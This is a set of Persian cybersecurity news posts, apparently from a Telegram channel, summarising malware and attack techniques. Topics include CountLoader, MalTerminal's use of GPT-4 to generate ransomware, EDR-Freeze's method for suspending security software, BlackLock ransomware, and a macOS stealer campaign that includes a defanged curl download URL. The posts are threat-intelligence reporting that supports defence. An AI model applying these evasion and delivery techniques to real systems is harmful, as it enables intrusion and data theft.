✅#CountLoader

بدافزار جدید CountLoader
باج‌افزاری با ۳ نسخه مختلف

این بدافزار کشف شده ارتباط قوی با گروه‌های باج‌افزاری روسی دارد. و در سه نسخه مختلف (NET، PowerShell و JScript) در حال گسترش است و اخیراً در یک کمپین فیشینگ با هدف قرار دادن شهروندان اوکراینی، با جعل هویت پلیس اوکراین، مشاهده شده است.

این بدافزار به عنوان یک Initial Access Broker (IAB) یا ابزاری در اختیار وابسته‌های باج‌افزاری عمل می‌کند و payloads مخربی مانند Cobalt Strike و Adaptix C2 را روی سیستم قربانی مستقر می‌کند. این بدافزار با گروه‌های باج‌افزاری معروفی مثل LockBit، BlackBasta و Qilin ارتباط دارد.

نحوه عملکرد و مکانیزم فنی

این Loader یک ابزار پیشرفته و چندمنظوره برای نفوذ اولیه است که با دقت بالایی طراحی شده تا شناسایی آن دشوار باشد.

۱. نسخه‌های مختلف و هدف‌گیری:

نسخه JScript/HTA: نسخه اصلی و کامل‌تر که با بیش از ۸۵۰ خط کد، قابلیت‌های گسترده‌ای دارد. این نسخه از طریق فایل‌های .hta که توسط mshta.exe اجرا می‌شوند، قربانی را آلوده می‌کند.

نسخه .NET و PowerShell: نسخه‌های ساده‌تری هستند که هر دو از مکانیزم مشابهی برای ارتباط با سرور و دانلود payload استفاده می‌کنند.

۲. تکنیک‌های پایداری و پنهان‌کاری:

برقراری ارتباط: بدافزار برای ارتباط با سرورهای فرماندهی و کنترل (C2) از الگوریتم‌های رمزنگاری XOR و Base64 استفاده می‌کند. این ارتباط به صورت یک حلقه تکرارشونده و با تلاش برای اتصال به چندین آدرس C2 انجام می‌شود تا از Fail شدن ارتباط جلوگیری کند.

پایداری : با ایجاد یک Scheduled Task در سیستم قربانی، با نامی جعلی شبیه به سرویس‌های گوگل (GoogleUpdaterTaskSystem135.0.7023.0) و همچنین تغییر کلید Registry Run، اطمینان حاصل می‌کند که با هر بار راه‌اندازی سیستم، دوباره اجرا شود.

استفاده از LOLBins: برای اجرای کدها و دانلود فایل‌ها از ابزارهای قانونی ویندوز مثل certutil و bitsadmin استفاده می‌کند که تشخیص آن را برای سیستم‌های امنیتی سخت‌تر می‌کند (این تکنیک در دنیای APT بسیار رایج است).

پنهان‌کاری: فایل‌های مخرب را در پوشه (موسیقی) سیستم قربانی ذخیره می‌کند، که برخلاف پوشه‌های رایج مثل AppData یا Temp است و احتمال بررسی آن توسط کاربران یا نرم‌افزارهای امنیتی کمتر است.

۳. ارتباط با باج‌افزارها:

تحلیل‌گران امنیتی با بررسی Payload‌های دانلود شده، موفق به استخراج واترمارکی از پیکربندی بدافزار Cobalt Strike شدند. این وارتمارک خاص (شناسه 1473793097) پیش از این در حملات باج‌افزاری Qilin مشاهده شده بود. همچنین واترمارک مرتبط دیگری نیز کشف شده که با گروه‌های BlackBasta و LockBit مرتبط است. این یافته‌ها، وجود یک اکوسیستم مشترک و همکاری بین این گروه‌ها یا استفاده از یک IAB مشترک را تأیید می‌کند.

یکی از پیشرفته‌ترین جنبه‌های این حمله ، استفاده از فایل‌های PDF دستکاری‌شده به عنوان اولین گام نفوذ است. برخلاف تصور رایج که حملات فیشینگ صرفاً از طریق لینک‌های مخرب یا فایل‌های اجرایی مستقیم صورت می‌گیرد، مهاجمان در این کمپین از یک تکنیک ظریف Social Engineering بهره برده‌اند. آن‌ها با جعل هویت پلیس ملی اوکراین، یک فایل PDF فریبنده را به قربانیان ارسال می‌کنند. این سند به ظاهر رسمی، حاوی یک (HTA) جاسازی‌شده است.

به محض اینکه قربانی روی دکمه یا لینک تعبیه‌شده در این PDF کلیک می‌کند، در پس‌زمینه و بدون نمایش هیچ‌گونه اخطار امنیتی، فایل HTA توسط موتور mshta.exe ویندوز اجرا می‌شود. این فرآیند، در واقع CountLoader را فعال کرده و حلقه ارتباطی با سرورهای C2 را آغاز می‌کند. این رویکرد، مهاجمان را قادر می‌سازد تا بدون استفاده از آسیب‌پذیری‌های Zero-day، از تعامل کاربر برای شروع فرآیند آلودگی بهره‌برداری کنند. این شیوه، نشان‌دهنده یک تاکتیک نوین در زنجیره حملات APT-style است که با ترکیب هوشمندانه مهندسی اجتماعی و تکنیک‌های قانونی سیستم عامل، به هدف خود می‌رسد و شناسایی آن را به شدت دشوار می‌سازد.

ابزار mshta.exe یک ابزار قانونی ویندوز برای اجرای فایل‌های HTML Application است. فایل‌های HTA در واقع فایل‌های HTML هستند که به جای اجرا در مرورگر، به صورت یک برنامه مستقل ویندوز اجرا می‌شوند. این برنامه‌ها دسترسی کامل به APIهای سیستم عامل دارند و از محدودیت‌های امنیتی مرورگرها عبور می‌کنند.

به دلیل همین قابلیت، مهاجمان سایبری اغلب از mshta.exe برای اجرای کدهای مخرب استفاده می‌کنند. آن‌ها کدهای مخرب خود را در یک فایل HTA قرار می‌دهند و از این طریق، بدافزار را بدون نیاز به یک فایل اجرایی سنتی (.exe) روی سیستم قربانی اجرا می‌کنند. این روش به آن‌ها کمک می‌کند تا از بسیاری از راهکارهای امنیتی که بر اساس شناسایی فایل‌های .exe مخرب کار می‌کنند، عبور کنند.

@NullError_ir

✅#AFTA
Advanced Forensics Triage Assista

آیا تا کنون در شرایط پاسخ به حادثه در سیستم‌های لینوکس، نیاز به یک ابزار سریع برای جمع‌آوری شواهد داشته‌اید؟

ابزاری قدرتمند و سبک برای سیستم‌عامل‌های لینوکسی طراحی کرده ام که کمک می‌کند تا در کوتاه‌ترین زمان ممکن، یک تصویر کامل و سازمان‌یافته از وضعیت یک سیستم آلوده تهیه کنید.

این ابزار فرآیند تریاژ را به صورت خودکار انجام می‌دهد و با جمع‌آوری ده‌ها آرتیفکت حیاتی، ریسک خطای انسانی و از دست رفتن داده‌های کلیدی را به حداقل می‌رساند.

✨ ویژگی‌های کلیدی:

* تخلیه حافظه RAM: به صورت خودکار آخرین نسخه AVML را دانلود و یک تصویر کامل از حافظه فیزیکی سیستم تهیه می‌کند.

* خروجی جامع: تمام داده‌ها را در یک فایل ساختاریافته report.json و آرتیفکت‌های حیاتی را در یک فایل .zip فشرده و آماده تحلیل می‌کند.

* پیکربندی آسان: با ویرایش یک فایل config.yaml می‌توانید دقیقا تعیین کنید کدام داده‌ها جمع‌آوری شوند.

* تحلیل‌های امنیتی: لیستی از فایل‌های SUID/SGID و هش باینری‌های مهم سیستمی را برای بررسی‌های بعدی ارائه می‌دهد.

این ابزار برای اجرا تنها به Python3 نیاز دارد و بدون هیچ‌گونه نصب پیچیده، به سرعت آماده کار است. این ابزار، یک ابزار ضروری برای هر Digital Forensics و Incident Response است.


لینک ابزار در گیت‌هابم


@NullError_ir

✅#MalTerminal

بدافزار جدید MalTerminal
بر پایه هوش مصنوعی OpenAi GPT-4

تیمی از محققان امنیتی با استفاده از YARA rules، فایل‌های باینری را برای پیدا کردن API Keyهای هاردکد شده و ساختارهای Prompt رایج در LLM ها، اسکن کردند. این رویکرد نوآورانه به آنها کمک کرد تا یک کلاستر از اسکریپت‌های پایتون مشکوک و یک فایل اجرایی ویندوز به نام MalTerminal.exe را کشف کنند.

تحقیقات نشان داد که این بدافزار از یک OpenAI API Endpoint قدیمی و منسوخ شده استفاده می‌کند که این موضوع نشان می‌دهد MalTerminal قبل از نوامبر ۲۰۲۳ ساخته شده و احتمالاً قدیمی‌ترین نمونه شناخته‌شده از بدافزارهای مبتنی بر LLM است.

### نسل جدید بدافزارها با هوش مصنوعی

این MalTerminal یک بدافزار معمولی نیست؛ بلکه یک Malware Generator است. این ابزار به جای اینکه کد مخرب را در خود داشته باشد، آن را در زمان اجرا (runtime) و به صورت پویا می‌سازد.

نحوه عملکرد:

1. اجرا: مهاجم MalTerminal.exe را اجرا می‌کند.

2. انتخاب هدف: ابزار از اپراتور خود می‌خواهد که بین ساخت Ransomware یا Reverse Shell یکی را انتخاب کند.

3. درخواست به GPT-4: MalTerminal یک درخواست به API مدل GPT-4 می‌فرستد. این درخواست شامل یک Prompt خاص است که از هوش مصنوعی می‌خواهد کد مخرب مورد نظر (مثلاً کد پایتون برای Ransomware) را تولید کند.

4. تولید و اجرا: GPT-4 کد مخرب را تولید کرده و آن را به MalTerminal برمی‌گرداند. سپس MalTerminal این کد را در حافظه سیستم قربانی اجرا می‌کند.

این رویکرد، یک تغییر پارادایم جدی در حملات سایبری است، چرا که MalTerminal با توجه به ماهیت خود، Static Analysis و ابزارهای Signature-Based Detection را دور می‌زند. از آنجایی که هیچ کد مخربی در فایل اصلی وجود ندارد، آنتی‌ویروس‌ها نمی‌توانند آن را از طریق امضای ثابت شناسایی کنند.

### تشابه MalTerminal و PromptLock

این دو بدافزار غالباً با یکدیگر مقایسه می‌شوند، اما تفاوت‌های کلیدی دارند:

*۔ PromptLock: این بدافزار که توسط محققان دانشگاه نیویورک به عنوان یک Proof-of-Concept کشف شد، از API Ollama برای اجرای یک LLM به صورت Local روی سیستم قربانی استفاده می‌کند. PromptLock کد مخرب را بر اساس Promptهای از پیش تعریف شده به صورت بلادرنگ می‌سازد. با این حال، چون یک پروژه تحقیقاتی بوده، به صورت گسترده در دنیای واقعی کشف نشده است.

*۔ MalTerminal: این بدافزار در دنیای واقعی (in the wild) کشف شده و از یک API خارجی (OpenAI API) استفاده می‌کند. این وابستگی به یک سرویس ابری، نقطه‌ای است که آن را آسیب‌پذیر می‌کند.

ظهور بدافزارهایی مانند MalTerminal و PromptLock چالش‌های جدیدی برای مدافعان سایبری ایجاد می‌کند.

چالش‌ها:

* پلی‌مورفیسم پیشرفته: بدافزار می‌تواند برای هر حمله، کد منحصربه‌فردی تولید کند، که شناسایی آن با روش‌های سنتی مبتنی بر امضا را بسیار سخت می‌کند.

* آنالیز شبکه: ترافیک شبکه این بدافزارها می‌تواند با ترافیک‌های قانونی استفاده از API مدل‌های LLM اشتباه گرفته شود و تشخیص آن را دشوار سازد.

راه‌های مقابله:

*۔ Threat Hunting مبتنی بر LLM: تیم‌های امنیتی باید استراتژی‌های خود را برای شکار تهدیدات بر اساس کشف استفاده غیرمعمول و مخرب از API های LLM تغییر دهند.

* مانیتورینگ ترافیک شبکه: شناسایی درخواست‌های مشکوک به API های معروف LLM، می‌تواند یک روش مؤثر باشد.

*۔ API Key Revocation: اگر یک API Key سرقت شده و در بدافزاری مانند MalTerminal استفاده شود، شرکت‌های سازنده LLM می‌توانند با غیرفعال کردن آن Key، بدافزار را بلااستفاده کنند.

*۔ Detection مبتنی بر رفتار: استفاده از ابزارهای امنیتی که رفتار غیرعادی فرآیندها را بررسی می‌کنند، می‌تواند در شناسایی MalTerminal مفید باشد. برای مثال، یک فایل اجرایی که ناگهان شروع به تولید و اجرای کدهای پایتون در حافظه می‌کند، می‌تواند یک رفتار مشکوک محسوب شود.

در نهایت، با وجود اینکه بدافزارهای مبتنی بر LLM هنوز در مراحل ابتدایی هستند، MalTerminal یک هشدار جدی است که نشان می‌دهد بازیگران تهدید (Threat Actors) به طور فعال در حال نوآوری هستند و مدافعان باید استراتژی‌های خود را برای تشخیص استفاده مخرب از LLM ها به‌روز کنند.

@NullError_ir

✅#EDR_Freeze

ابزار EDR-Freeze:
یک ابزار خطرناک برای متوقف کردن EDR و آنتی‌ویروس‌ها

تصور کنید در حال انجام یک نفوذ هستید. به یک سیستم Endpoint دسترسی پیدا کرده‌اید، اما دیوار بتنی EDR (Endpoint Detection and Response) و آنتی‌ویروس (Antivirus) در مقابل شما ایستاده است. هر حرکت مشکوکی به سرعت شناسایی و مسدود می‌شود. چاره چیست؟

بسیاری از مهاجمان در این شرایط به تکنیک‌های پیشرفته‌ای مانند BYOVD (Bring Your Own Vulnerable Driver) روی می‌آورند. در این روش، مهاجم یک درایور (Driver) آسیب‌پذیر را به سیستم قربانی منتقل و از طریق آن، فرآیندهای امنیتی را غیرفعال می‌کند. اما این تکنیک یک نقطه ضعف بزرگ دارد: شناسایی و نصب یک درایور آسیب‌پذیر در یک سیستم مانیتورینگ شده توسط EDR، ریسک بسیار بالایی دارد و می‌تواند منجر به آلارم‌های جدی و حتی Response تیم امنیتی شود.

اینجا است که ابزار EDR-Freeze وارد میدان می‌شود؛ یک ابزار نوآورانه و بی‌سروصدا که به جای استفاده از درایورهای خارجی، از یک قابلیت داخلی خود ویندوز برای "خواباندن" موقت فرآیندهای امنیتی استفاده می‌کند.

تکنیک زیر پوست ویندوز: MiniDumpWriteDump و WerFaultSecure

مغز متفکر این حمله، سوءاستفاده از یک API قانونی ویندوز به نام MiniDumpWriteDump است. این تابع بخشی از کتابخانه DbgHelp است و وظیفه‌اش گرفتن یک Snapshot از حافظه و وضعیت یک فرآیند (اصطلاحاً Minidump) برای اهداف Debugging است. نکته کلیدی کجاست؟ در هنگام انجام این کار، تابع MiniDumpWriteDump تمام Threadهای فرآیند هدف را Suspend (متوقف) می‌کند تا یک کپی پایدار و بدون تغییر از آن تهیه کند.

حالا به دو چالش اصلی می‌رسیم:

1. سرعت: اجرای این تابع بسیار سریع است و Suspend کردن فرآیند تنها برای چند میلی‌ثانیه طول می‌کشد. برای اینکه بتوانیم از این حالت Suspend سوءاستفاده کنیم، باید آن را به صورت نامحدود ادامه دهیم.

2. حفاظت PPL: فرآیندهای حیاتی EDR و آنتی‌ویروس با یک مکانیزم امنیتی قدرتمند ویندوز به نام PPL (Protected Process Light) محافظت می‌شوند. این مکانیزم اجازه نمی‌دهد که فرآیندهای عادی (User-Mode) به سادگی با آنها تعامل داشته باشند، آنها را Kill کنند یا وضعیتشان را تغییر دهند.

ابزار EDR-Freeze چگونه از این دو چالش عبور می‌کند؟

این ابزار برای حل این مشکلات، از یک تکنیک خلاقانه و مبتنی بر Race Condition استفاده می‌کند:

1. بایپس PPL با WerFaultSecure:

* برنامه WerFaultSecure.exe یک ابزار قانونی ویندوز برای گزارش خطاهای برنامه است و یک ویژگی منحصربه‌فرد دارد: می‌تواند با سطح حفاظت PPL نوع WinTCB اجرا شود. این سطح حفاظت به آن اجازه می‌دهد تا با فرآیندهای PPL تعامل کند.

*ابزار EDR-Freeze با استفاده از ابزاری مانند CreateProcessAsPPL ، یک فرآیند WerFaultSecure.exe با پارامترهای خاص ایجاد می‌کند تا آن را مجبور به اجرای تابع MiniDumpWriteDump روی فرآیند هدف (مثلاً Windows Defender) کند.

2. قفل کردن فرآیند با Race Condition:

* به محض اینکه WerFaultSecure شروع به کار می‌کند، EDR-Freeze به صورت مداوم وضعیت فرآیند هدف (آنتی‌ویروس/EDR) را چک می‌کند.

* لحظه‌ای که MiniDumpWriteDump شروع به کار می‌کند و فرآیند هدف به حالت Suspend می‌رود، EDR-Freeze به سرعت وارد عمل شده و فرآیند WerFaultSecure را با استفاده از تابع NtSuspendProcess متوقف (Suspend) می‌کند!

* نتیجه چیست؟ فرآیند WerFaultSecure که مسئول Resume کردن فرآیند هدف بود، خودش به حالت Suspend رفته و فرآیند آنتی‌ویروس/EDR برای همیشه در حالت Suspend باقی می‌ماند.

این تکنیک به مهاجم اجازه می‌دهد تا به صورت موقت و برای مدت دلخواه (مثلاً چند ثانیه یا چند دقیقه) تمام فرآیندهای حیاتی امنیتی را از کار بیندازد، Payload خود را اجرا کرده و سپس کار را به حالت عادی بازگرداند.

@NullError_ir

✅#BlackLock

باج‌افزار BlackLock

یک گروه پیشرفته و خطرناک با توانایی‌های منحصر به فرد خود، به یک تهدید جدی برای سازمان‌ها تبدیل شده است. این گروه که از مارس ۲۰۲۴ با نام "El Dorado" فعالیت خود را آغاز کرد و سپس به BlackLock تغییر برند داد، با استفاده از زبان برنامه‌نویسی Go، توانسته بدافزاری چند-سکویی توسعه دهد که به صورت یکپارچه بر روی سیستم‌های ویندوز، لینوکس و حتی محیط‌های VMware ESXi قابل اجراست. این ویژگی، سطح حمله را به طرز چشمگیری افزایش داده و به مهاجمین اجازه می‌دهد کل زیرساخت IT یک سازمان را به صورت همزمان آلوده کنند.

معماری حمله و تکنیک‌های پیشرفته

این باج‌افزار با جذب Affiliateهای ماهر از طریق انجمن‌های زیرزمینی مانند RAMP در فضای سایبری روسی‌زبان، گستره حملات خود را وسعت می‌بخشد. ویژگی‌های فنی این باج‌افزار شامل موارد زیر است:

* روش‌های رمزگذاری دو لایه: بدافزار برای رمزگذاری فایل‌ها از الگوریتم ChaCha20 استفاده می‌کند. برای هر فایل، یک کلید (FileKey) و یک Nonce تصادفی تولید می‌شود. این کلیدها سپس با استفاده از تکنیک Elliptic Curve Diffie-Hellman (ECDH) و الگوریتم secretbox.Seal() رمزگذاری شده و به متادیتای هر فایل اضافه می‌گردند. این رویکرد دو مرحله‌ای، بازگردانی اطلاعات بدون ابزارهای مهاجمان را عملاً غیرممکن می‌سازد.

* قابلیت‌های انعطاف‌پذیر: بدافزار از آرگومان‌های خط فرمان مختلفی پشتیبانی می‌کند که به مهاجم امکان کنترل کامل می‌دهد:

۔* -path: برای رمزگذاری مسیرهای خاص.
۔* -delay: برای تأخیر در اجرای بدافزار.
۔* -threads: برای بهینه‌سازی سرعت رمزگذاری.
۔* -perc: برای رمزگذاری جزئی فایل‌ها (Partial Encryption) که سرعت حمله را افزایش و از سوی دیگر احتمال شناسایی را کاهش می‌دهد.

* حرکت جانبی : برای گسترش در شبکه‌های ویندوزی، BlackLock از پروژه‌های متن‌باز مانند go-smb2 برای اسکن و دسترسی به پوشه‌های اشتراکی SMB استفاده می‌کند. این بدافزار می‌تواند با استفاده از پسوردهای Plaintext یا NTLM hashها، در شبکه به صورت جانبی حرکت کرده و سیستم‌های ذخیره‌سازی تحت شبکه را همزمان رمزگذاری کند.

* تخریب شواهد و راه‌های بازیابی: BlackLock از روش‌های پیچیده‌ای برای حذف Volume Shadow Copyها و محتویات Recycle Bin استفاده می‌کند. به جای استفاده از دستورات خط فرمان معمول مانند vssadmin.exe که به راحتی توسط راهکارهای امنیتی شناسایی می‌شوند، این بدافزار با ساخت COM objectها، کوئری‌های WMI را از طریق Shellcode که مستقیماً در حافظه بارگذاری شده است، اجرا می‌کند. این تکنیک، شناسایی و تشخیص را بسیار دشوار می‌کند.

باج‌خواهی و روانشناسی حمله

پیام باج‌خواهی که با عنوان HOW_RETURN_YOUR_DATA.TXT در هر دایرکتوری ایجاد می‌شود، علاوه بر درخواست باج، حاوی تهدیداتی مبنی بر افشای داده‌ها به مشتریان و عموم است. این استراتژی Double Extortion (اخاذی مضاعف) ، با ایجاد فشار روانی شدید، سازمان‌ها را مجبور به پرداخت باج می‌کند.

پیچیدگی فنی ، به‌خصوص قابلیت چند-سکویی بودن، توانایی‌های استتار و استفاده از تکنیک‌های پیشرفته برای حرکت جانبی و تخریب داده‌ها، آن را به یکی از تهدیدهای برجسته در فضای سایبری تبدیل کرده است. برای مقابله مؤثر با این باج‌افزار در سطح یک سازمان، یک رویکرد چندلایه ضروری است:

1. حفاظت از Endpointها و سیستم‌ها:

* استفاده از راهکارهای (EDR) و (XDR) برای شناسایی رفتار غیرعادی بدافزار، به‌ویژه تکنیک‌های Load کردن Shellcode در حافظه یا استفاده از ابزارهای بومی سیستم (Living off the land).

* مدیریت پچینگ: به‌روزرسانی مداوم سیستم‌عامل‌ها، هایپروایزرها (به‌ویژه VMware ESXi) و نرم‌افزارهای کاربردی، جهت بستن مسیرهای نفوذ اولیه.

2. امنیت شبکه:

* تقسیم‌بندی شبکه: جداسازی سیستم‌های حیاتی از بخش‌های کمتر حساس شبکه، برای جلوگیری از حرکت جانبی (Lateral Movement) در صورت آلوده شدن یک سیستم.

* محدودسازی SMB: غیرفعال‌سازی یا محدود کردن ترافیک پروتکل SMB در نقاط غیرضروری شبکه و همچنین استفاده از فایروال‌های مبتنی بر هویت برای کنترل دقیق دسترسی‌ها.

3. مدیریت هویت و دسترسی (IAM):

* پیاده‌سازی Multi-Factor Authentication (MFA) برای تمامی سرویس‌ها، به‌ویژه Remote Accessها و حساب‌های Privileged.

* استفاده از اصل Least Privilege یا حداقل دسترسی برای کاربران و ادمین‌ها، تا در صورت سرقت اعتبارنامه، سطح نفوذ مهاجم محدود شود.

4. بازیابی اطلاعات:

* داشتن Backupهای منظم، ایزوله (Offline) و با قابلیت بازیابی سریع. تست مداوم فرآیند بازیابی بک‌آپ‌ها حیاتی است. این بک‌آپ‌ها باید در مقابل حملات بدافزاری مانند BlackLock محافظت شده باشند.

@NullError_ir

✅#macOS

حمله APT-گونه جدید برای فریب کاربران macOS
با بهره‌گیری از SEO و GitHub Pages برای توزیع Atomic Stealer

کمپینی که جدیدا علیه کاربران سیستم‌عامل macOS شناسایی شده، نمونه بارزی از این تکامل است که فراتر از حملات فیشینگ ساده عمل می‌کند و از ترکیب هوشمندانه (SEO) و پلتفرم‌های معتبر برای افزایش موفقیت خود بهره می‌برد. این کمپین، بدافزار Atomic Stealer (که با نام AMOS نیز شناخته می‌شود) را به قربانیان تحویل می‌دهد.

زنجیره حمله (Attack Chain)

این عملیات سایبری یک زنجیره حمله چندمرحله‌ای و پیچیده را دنبال می‌کند که از فریب اولیه کاربر تا سرقت اطلاعات حساس، طراحی شده است:

1. مرحله اول: SEO Poisoning
مهاجمین با ایجاد ریپازیتوری‌های جعلی در GitHub که نام‌هایی شبیه به نرم‌افزارهای محبوب (مانند LastPass یا سایر ابزارهای مدیریت پسورد) دارند، از تکنیک‌های SEO استفاده می‌کنند. این ریپازیتوری‌ها به گونه‌ای بهینه‌سازی می‌شوند که در نتایج موتورهای جستجو مانند گوگل و بینگ، در رتبه‌های بالا قرار بگیرند. کاربرانی که به دنبال نرم‌افزار مورد نظر خود هستند، به راحتی به این نتایج جعلی اعتماد کرده و روی آن‌ها کلیک می‌کنند.

2. مرحله دوم: Faking a Trustworthy Platform
با کلیک روی لینک، کاربر به یک صفحه GitHub Pages منتقل می‌شود که ظاهری کاملاً رسمی و معتبر دارد. این صفحه حاوی دستورالعمل‌ها و لینک‌های دانلود فریبنده‌ای است که کاربر را به انجام اقدامات مخرب ترغیب می‌کند. این تاکتیک، از اعتبار GitHub به عنوان یک پلتفرم معتبر برای میزبانی کد و پروژه‌ها سوءاستفاده می‌کند.

3. مرحله سوم: Redirect to Staging Site
لینک‌های موجود در صفحه GitHub Pages، کاربر را به یک "Staging Site" یا وب‌سایت میانی هدایت می‌کنند. در نمونه‌ای که LastPass Threat Intelligence شناسایی کرد، قربانی به صفحه‌ای با آدرس hxxps://ahoastock825[.]github[.]io/ و سپس به macprograms-pro[.]com منتقل می‌شد. این مرحله به مهاجمین اجازه می‌دهد که آدرس اصلی بدافزار را پنهان نگه داشته و در صورت شناسایی، به راحتی آن را تغییر دهند.

4. مرحله چهارم: Command Injection & Payload Delivery
در Staging Site، از کاربر خواسته می‌شود تا یک دستور Terminal را اجرا کند. این دستور معمولاً از طریق `curl` یک اسکریپت شل مخرب را از یک سرور خارجی (مانند bonoud[.]com/get3/install.sh) دانلود و اجرا می‌کند. این اسکریپت به صورت Base64-encoded پنهان شده تا از شناسایی اولیه توسط فایروال‌ها یا ابزارهای امنیتی ساده جلوگیری کند.

5. مرحله پنجم: Exfiltration and Persistence
اسکریپت دانلود شده، بدافزار Atomic Stealer را روی سیستم قربانی نصب می‌کند. این بدافزار با هدف سرقت اطلاعات حساس مانند پسوردها، کوکی‌های مرورگر، اطلاعات کیف پول‌های ارز دیجیتال و گواهینامه‌های سیستمی طراحی شده است. پس از نصب، بدافزار با ایجاد Persistence (مانند افزودن به آیتم‌های راه‌اندازی سیستم) از بین رفتن خود جلوگیری کرده و داده‌های سرقت شده را به سرور Command and Control (C2) مهاجمین ارسال می‌کند.

تکنیک‌های مهاجمین و درس‌های APT

این حمله شباهت‌های قابل توجهی به تاکتیک‌های گروه‌های (APT) دارد، که نشان‌دهنده سطح بالای طراحی و اجرای آن است:

* استفاده از زیرساخت‌های توزیع‌شده (Distributed Infrastructure): مهاجمین با ایجاد چندین یوزرنیم و ریپازیتوری در GitHub، به محض حذف یک ریپازیتوری، از دیگری استفاده می‌کنند. این رویکرد، Resilience یا مقاومت عملیاتی آن‌ها را افزایش می‌دهد.

* استفاده از پلتفرم‌های معتبر (Trusted Platforms): بهره‌برداری از GitHub به عنوان یک پلتفرم قانونی و قابل اعتماد، اعتماد قربانی را به شدت افزایش می‌دهد و از شناسایی سریع توسط ابزارهای امنیتی جلوگیری می‌کند.

* پنهان‌کاری (Obfuscation): استفاده از تکنیک‌هایی مانند Base64-encoding برای پنهان کردن URLهای مخرب، فرآیند تحلیل و تشخیص بدافزار را پیچیده‌تر می‌کند.

@NullError_ir

✅#Inboxfuscation

ابزار Inboxfuscation
ابزاری که قواعد صندوق ورودی Exchange را دور می‌زند و یک روش APT جدید برای Persistence ارائه می‌دهد

در دنیای سایبر امروزی، حمله‌کنندگان به طور فزاینده‌ای از تکنیک‌های Living off the Land (LotL) و ابزارهای بومی سیستم‌ها برای ماندگاری (Persistence) و استخراج داده (Exfiltration) استفاده می‌کنند. یکی از این اهداف مهم، قوانین صندوق ورودی (Inbox Rules) در Microsoft Exchange است که به دلیل ماهیت کاربردی‌شان، اغلب کمتر مورد توجه تیم‌های دفاعی قرار می‌گیرند.

ابزار جدیدی به نام Inboxfuscation که توسط شرکت Permiso توسعه یافته، یک دیدگاه جدید و پیشرفته از چگونگی سوءاستفاده از این مکانیزم‌ها را به نمایش می‌گذارد. این ابزار از تکنیک‌های Unicode-based obfuscation بهره می‌برد تا قواعد مخرب را به گونه‌ای ایجاد کند که از دید ابزارهای امنیتی سنتی و حتی بازبینی‌های انسانی پنهان بمانند. در واقع، این ابزار یک نقطه کور (Blind Spot) حیاتی در امنیت ایمیل را آشکار می‌سازد که می‌تواند توسط مهاجمان پیشرفته (APT) مورد بهره‌برداری قرار گیرد.

مکانیزم کار و Obfuscation پیشرفته با Unicode

در حملات سنتی مربوط به Inbox Rules، مهاجمان از کلمات کلیدی و اکشن‌های ساده‌ای مثل Forward یا Delete برای ساخت قواعد خود استفاده می‌کردند. این روش‌ها به راحتی توسط مکانیزم‌های تشخیص مبتنی بر کلمات کلیدی یا Regex شناسایی می‌شوند. اما Inboxfuscation این پارادایم را به طور کامل تغییر می‌دهد.

این ابزار با جایگزینی کاراکترهای ASCII با نسخه‌های مشابه Unicode ، تزریق کاراکترهای Zero-Width ، دستکاری جهت متن (Bidirectional Text) و ترکیب چندین تکنیک مختلف، قواعدی را می‌سازد که ظاهراً بی‌ضرر به نظر می‌رسند اما عملکرد کاملاً مخربی دارند.

به عنوان مثال، کلمه secret می‌تواند با استفاده از این تکنیک‌ها به فرم‌های زیر تغییر یابد:

۔* Ⓢⓔⓒⓡⓔⓣ: استفاده از کاراکترهای Mathematical Alphanumeric Symbols (U+1D4B6) که در ظاهر شبیه حروف عادی هستند.

۔* s‍e‍c‍r‍e‍t: تزریق کاراکترهای Zero-Width Joiner (U+200D) بین حروف. این کاراکترها در خروجی‌های متنی مثل Get-InboxRule دیده نمی‌شوند اما در پردازش موتور Exchange به عنوان حروف به هم پیوسته تفسیر می‌شوند.

۔* tse‍rces: استفاده از کاراکتر Right-to-Left Override (U+202E) که جهت متن را برعکس می‌کند.

این تکنیک‌ها باعث می‌شوند که خروجی دستوراتی مانند Get-InboxRule در PowerShell، قواعد را به صورت عادی نمایش دهد و چشم انسان قادر به تشخیص این obfuscation نباشد، در حالی که موتور Exchange آن را به درستی تفسیر می‌کند و ایمیل‌هایی با محتوای secret را مورد هدف قرار می‌دهد.

تکنیک‌های Obfuscation عملکردی

۔**Inboxfuscation** تنها به obfuscation متنی محدود نمی‌شود و ترفندهای عملکردی دیگری را نیز معرفی می‌کند. برای مثال، این ابزار می‌تواند قواعدی بسازد که به جای ارسال ایمیل به آدرس خارجی، آن‌ها را به پوشه‌های غیرمعمول مانند Calendar یا Tasks منتقل کند. این کار باعث می‌شود که این فعالیت‌ها از رصد ابزارهایی که به صورت معمول تنها روی پوشه Sent Items یا Deleted Items نظارت دارند، خارج شود.

یکی دیگر از تکنیک‌های خطرناک، تزریق کاراکتر Null (U+0000) به نامِ قانون (Rule's Name) است. این کار باعث می‌شود که در برخی خروجی‌ها نمایش داده نشود و حتی در برخی موارد، retrieval آن را دشوار یا غیرممکن می‌سازد.
مثلا در ترمینال این رو بنویسید تا متوجه این کارکتر شوید

echo -e 'salam\x00ls'

راهکار مقابله و نتیجه‌گیری

با توجه به این که ابزارهای امنیتی سنتی بر اساس تطابق الگوهای ASCII کار می‌کنند و فرض می‌کنند که محتوا قابل خواندن و ساده است، در برابر Inboxfuscation کاملاً آسیب‌پذیر هستند. برای مقابله با این تهدید، تیم‌های امنیتی باید استراتژی‌های زیر را به کار گیرند:

1۔ پیاده‌سازی Detection Rules با قابلیت Unicode-Aware: سیستم‌های SIEM و راهکارهای امنیتی باید به گونه‌ای به‌روزرسانی شوند که بتوانند کاراکترهای غیرمعمول Unicode، به‌ویژه کاراکترهای Zero-Width یا Right-to-Left را در قوانین ایمیل تشخیص دهند و آن‌ها را به عنوان پرچم‌های مشکوک (Suspicious Flags) علامت‌گذاری کنند.

2۔ Audit و تحلیل دوره‌ای قوانین: انجام بررسی‌های جامع و دوره‌ای بر روی تمامی Inbox Rules در سازمان، یک امر حیاتی است. این بررسی‌ها باید شامل اسکریپت‌هایی باشند که خروجی Get-InboxRule را به صورت دقیق بررسی و هرگونه کاراکتر Unicode غیرعادی را تحلیل کنند.

✅#DDoS

شرکت کلودفلر (Cloudflare) اعلام کرد حمله DDoS با سرعت ۲۲.۲ ترابیت بر ثانیه، رکورد جهانی جدیدی را در اینترنت شکست .. این حمله ٤۰ ثانیه طول کشید و خدا میداند در پس زمینه چه خبرهایی شده است 💀.


@NullError_ir

✅#Nimbus_Manticore

گروه Nimbus Manticore با بدافزار جدید

